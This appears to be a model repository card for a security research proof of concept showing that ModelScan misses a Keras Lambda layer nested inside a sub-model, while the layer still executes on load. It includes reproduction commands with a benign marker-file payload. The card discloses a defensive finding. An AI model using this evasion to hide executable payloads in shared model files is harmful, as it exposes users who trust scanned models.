You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

ModelScan bypass PoC — Nested Lambda in .keras

Security research PoC for the Protect AI Huntr "Model Format Vulnerability" program.

Issue: ModelScan only inspects top-level layers when scanning .keras/.h5 for class_name == "Lambda". A Lambda layer nested inside a sub-model (Sequential/Functional) is not detected (total_issues = 0), yet Keras reconstructs and executes it on load+use.

Payload in this PoC is benign: os.system("touch /tmp/keras_nested_pwned").

Reproduce

pip install modelscan keras tensorflow
modelscan -p nested_evil.keras        # -> "No issues found" / total_issues=0  (BYPASS)
python -c "import keras,numpy as np; m=keras.saving.load_model('nested_evil.keras',safe_mode=False,compile=False); m.predict(np.zeros((1,3)))"
ls /tmp/keras_nested_pwned            # marker created -> code executed
Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support